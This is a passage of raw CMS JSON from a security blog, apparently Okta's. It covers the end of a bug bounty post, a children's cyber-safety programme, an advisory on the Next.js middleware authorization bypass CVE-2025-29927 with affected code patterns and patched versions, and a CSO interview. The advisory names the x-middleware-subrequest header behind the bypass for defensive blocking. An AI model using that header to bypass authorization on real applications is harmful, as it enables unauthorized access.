development.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2sW9AK8hIViLNpOnHf7a9K\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We invite you to review Okta’s defined \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/vulnerability-reporting-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability Reporting Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which details the do’s and don’ts of security research for our Identity platforms and includes additional helpful guidance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Watch \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/bug-bounty-at-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane 2024 On Demand\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to deep dive into Okta’s BugCrowd programs from our own Product Security experts. To learn more, including how to participate, read on about \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/engagements/okta\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s BugCrowd\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/engagements/auth0-okta\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0’s BugCrowd\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" Bug Bounty programs.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"What was once considered a controversial topic has gained widespread appeal as a crucial practice in the ongoing fight against threat actors and vulnerability exploitation. Ethical hackers and security researchers are revolutionizing today’s vulnerability management programs and reducing online risks by participating in Bug Bounty programs and disclosing vulnerabilities responsibly."},"updatedAt":"2025-04-09T16:56:16.284Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2025/03/cybersecurity-next-gen","id":"6f784a53-c4c5-5fbc-b97e-e14120ad32c9","title":"Cybersecurity’s Next Gen","date":"2025-03-26T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Children are diving into the digital world earlier than ever, making it essential to instill good cyber habits from the start. This year, a staggering \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.emarketer.com/content/data-drop-5-charts-on-childrens-internet-habits\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"80%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of internet users under the age of 11 will use a tablet at least once a month. However, many young users explore the online world without fully understanding its risks. As technology becomes a staple in childhood, teaching kids how to safely navigate the internet is more important than ever.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cyber safety begins with healthy cybersecurity habits. Early adoption of good habits can protect our youth from online threats like cyberbullying, exposure to inappropriate content, and identity theft. Okta’s commitment to security from the ground up is demonstrated by empowering the next generation with essential cybersecurity skills.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cyber Kidz\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Earlier this year, Okta’s Security Culture team launched its Cyber Kidz program in Sydney, Australia. The program is designed to empower children to stay safe through hands-on learning, interactive games, and real-world cybersecurity challenges. Our goal is to equip our youth with essential digital skills, fostering cybersecurity awareness and education in a fun, family-friendly environment that promotes practical cybersecurity habits across generations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The in-person holiday event encouraged our little learners to recognize online threats, protect their personal information, and develop strong cyber habits, all while having fun! To best engage our Cyber Kidz, we tailored activities to their age groups with targeted, age-appropriate activities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building the Defenders of Tomorrow\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our cyber adventurers had an incredible time diving into the world of cybersecurity through hands-on activities and interactive challenges. They explored key cyber concepts with fun games like interactive hangman and a scavenger hunt, all while making new friends along the way. Creativity flowed as they built robots and circuit boards, experimented with coding games, and worked on arts and crafts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For those ready to advance their skill set, the adventure continued with ethical hacking, cracking ciphers, and cyber sleuthing. They kicked the day off with an engaging session from the Australian Federal Police on online safety before testing their skills in an epic capture-the-flag challenge—cracking codes, crafting phishing emails, picking locks, and even attempting to socially engineer Okta employees.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The success of our program came down to one simple approach: our team took the time to step into the digital world of each participant, designing activities that genuinely engaged and educated them. Cyber safety isn’t just about the next generation — it’s a responsibility for all of us. As we equip young minds with the skills to navigate the online world safely, it's equally important for parents and caregivers to stay informed. Keeping up with the latest technologies and understanding evolving cyber threats is key to fostering a culture of security at home and beyond.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expanding our Reach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building on this success, we’re excited to take our cybersecurity education program global at Okta! To reach even more young minds, the program will tackle real-world cybersecurity issues such as: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"misinformation and fake news,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"social engineering, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the lasting impact of a digital footprint. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Through interactive cyber simulations designed for different skill levels, participants will learn to critically assess online information, recognize manipulation tactics, and understand how their digital actions shape their online identity. To make learning even more immersive, we’re incorporating Amazing Race-style capture-the-flag challenges, where participants will race against time to solve puzzles, decode clues, and apply their cybersecurity knowledge in fast-paced, high-energy competitions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By making cybersecurity education more accessible and engaging, we’re empowering the next generation of digital defenders—wherever they are in the world. If you’re interested in learning more about our global initiative or want to explore how this program can benefit your organization, contact us at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:securityculture@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"securityculture@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". We’d love to share more about how we can work together to create a safer digital future.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Cyber safety begins with healthy cybersecurity habits. Early adoption of good habits can protect our youth from online threats like cyberbullying, exposure to inappropriate content, and identity theft. This blog article introduces Okta's Cyber Kidz program, which was launched earlier this year in Sydney, Australia. Okta’s commitment to security from the ground up is demonstrated by empowering the next generation with essential cybersecurity skills. "},"updatedAt":"2025-03-26T17:52:14.529Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"},{"id":"b9b8fd15-ef20-5964-84b5-33227017531e","bio":{"bio":"Caroline von Konigsmark is a Senior Security Culture Analyst at Okta. She champions a human-centered approach to security that moves beyond checkboxes and fear-based messaging to create a culture of shared responsibility. With a background in communications and experience in a regulatory cyber role, Caroline brings a unique lens to the challenge of driving behavioral change. She designs engagement strategies grounded in empathy, clarity, and storytelling, helping people feel informed, empowered, and invested in security.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2aSk0IoKCi4O0jCqesigDQ/4c37469dfa746231be167be4d5c1d3af/b0f1b21b-81e5-42ef-9f91-743f43a71106.jpeg"},"name":"Caroline von Konigsmark","jobTitle":null,"slug":"/hackers/caroline-von-konigsmark","node_locale":"en"}]},{"slug":"/nextjs-CVE-202529927","id":"c45ef287-575c-5b98-a172-fa5daacf5795","title":"Next.js CVE-2025-29927","date":"2025-03-24T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On March 21, 2025, Vercel disclosed a critical security vulnerability (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/advisories/GHSA-f82v-jwr5-mffw\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2025-29927\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") which makes it possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Note\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The Okta service is not affected by this vulnerability.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Action for nextjs-auth0 SDK customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For Auth0 customers using Next.js applications with the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/auth0/nextjs-auth0\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"nextjs-auth0\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" SDK we recommend auditing your codebase for any logic where authentication or authorization decisions are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"exclusively\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" made in middleware functions. Below are examples of this logic in v4 and v3 of the SDK.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/auth0/nextjs-auth0/blob/main/EXAMPLES.md#middleware\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"v4 of the SDK\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"import { NextRequest, NextResponse } from \\\"next/server\\\"\\nimport { auth0 } from \\\"@/lib/auth0\\\"\\nexport async function middleware(request: NextRequest) {\\n const authRes = await auth0.middleware(request)\\n if (request.nextUrl.pathname.startsWith(\\\"/auth\\\")) {\\n return authRes\\n }\\n const session = await auth0.getSession(request)\\n if (!session) {\\n // user is not authenticated, redirect to login page\\n return NextResponse.redirect(new URL(\\\"/auth/login\\\", request.nextUrl.origin))\\n }\\n // the headers from the auth middleware should always be returned\\n return authRes\\n}\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/auth0/nextjs-auth0/blob/v3/EXAMPLES.md#protecting-pages-with-middleware\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"v3 of the SDK\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"// middleware.js\\nimport { withMiddlewareAuthRequired } from '@auth0/nextjs-auth0/edge';\\nexport default withMiddlewareAuthRequired();\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"// middleware.js\\nimport { withMiddlewareAuthRequired, getSession } from '@auth0/nextjs-auth0/edge';\\nexport default withMiddlewareAuthRequired(async function middleware(req) {\\n const res = NextResponse.next();\\n const user = await getSession(req, res);\\n …\\n})\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you are using any other third-party library (for example, NextAuth.js) we also recommend you review your application for similar logic. For example, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://next-auth.js.org/configuration/nextjs#middleware\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"only relying on a middleware\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to protect your application:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"export { default } from \\\"next-auth/middleware\\\";\\nexport const config = {\\n matcher: [\\\"/dashboard\\\"]\\n};\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Remediation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To remediate this vulnerability, upgrade to one of the following versions of Next.js:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 15\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"15.2.3\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 14\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"14.2.25\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 13\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"13.5.9\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next.js 12\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"12.3.5\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If upgrading Next.js is not an option, the official recommendation is to block external requests which contain the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"x-middleware-subrequest \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"header.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Not Affected\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nYour application is not affected under the following conditions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications hosted on Vercel\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications hosted on Netlify\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications deployed as static exports\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications that do not exclusively rely on the Next.js Middleware for authentication and authorization. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Applications that perform additional authentication for all Server Rendered Components, Page Routes, or API Routes. This can done by invoking \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"auth0.getSession()\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in v4 or by using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"getSession()\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" , \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"withApiAuthRequired\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"withPageAuthRequired\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in v3.\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Additional Resources\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvd.nist.gov/vuln/detail/CVE-2025-29927\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://nvd.nist.gov/vuln/detail/CVE-2025-29927\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/advisories/GHSA-f82v-jwr5-mffw\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://github.com/advisories/GHSA-f82v-jwr5-mffw\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nextjs.org/blog/cve-2025-29927\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://nextjs.org/blog/cve-2025-29927\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developers.cloudflare.com/changelog/2025-03-22-next-js-vulnerability-waf/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://developers.cloudflare.com/changelog/2025-03-22-next-js-vulnerability-waf/\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"On March 21, 2025, Vercel disclosed a critical security vulnerability (CVE-2025-29927) which makes it possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. Note: The Okta service is not affected by this vulnerability.\n"},"updatedAt":"2025-03-24T07:19:38.658Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2025/03/cso-conversations-matthew-hansen","id":"ff47dcaf-ab11-52de-af84-f9f53c2258e1","title":"CSO Conversations: Matthew Hansen, Regional CSO of Americas West","date":"2025-03-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What motivated you to pursue a career in cybersecurity?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I started my career working in the risk consulting practice for a Big 4 firm and learned that cybersecurity was a critical component for customers in highly regulated industries. A significant influence on shaping my career in risk management was primarily focusing on the financial services, pharmaceuticals, aviation, and oil and gas industries, each of which has unique regulatory and security requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How has your past audit and regulatory compliance experience shaped your approach to cybersecurity today?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"My journey of risk management consulting and internal audit has given me broad exposure to a number of industries, frameworks, and regulations. But I believe it presents a common theme: companies have implemented the Three Lines of Defense framework. Often, operationally speaking, employees still overlook risk management as “not their problem.” I’m motivated to be an agent of change and help companies address their risk through an Identity risk-based lens.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What are your thoughts on the importance of vulnerability management in cybersecurity?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Like everything in the tech world, the vulnerability management landscape is constantly evolving. Organizations need to prioritize not only how they protect their businesses and stakeholders but also how they tactically respond to weaknesses before attackers can exploit them. With budget and resource constraints putting more emphasis on automation efficiency and AI, we see organizations scaling at incredible speeds in reducing their risk of exposure or attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When looking at your organization's identity evolution, don't just “throw the kitchen sink” as the only solution. Instead, try to create specific, measurable, achievable, relevant, and time-bound goals to methodically tackle cybersecurity problems.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In your opinion, what is the impact of cybersecurity awareness in today’s organizations?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The First Lines of Defense in any organization are its people. Throughout my career, I’ve found that cybersecurity maturity and security awareness among your employees must be in unison for a strong fabric of cybersecurity DNA. You cannot have one without the other. The level of maturity and strength of your security culture can have a double-down effect on increasing accountability, promoting ownership, and strengthening how your organization manages risks. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In what ways do you demonstrate \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s corporate values\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in your day to day?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s core values are deeply rooted principles that guide our day-to-day decisions and actions. This translates to a unique set of tenets that drive our interactions with customers to help build trustworthy relationships, uplift their identity posture, reduce security friction, and produce positive security 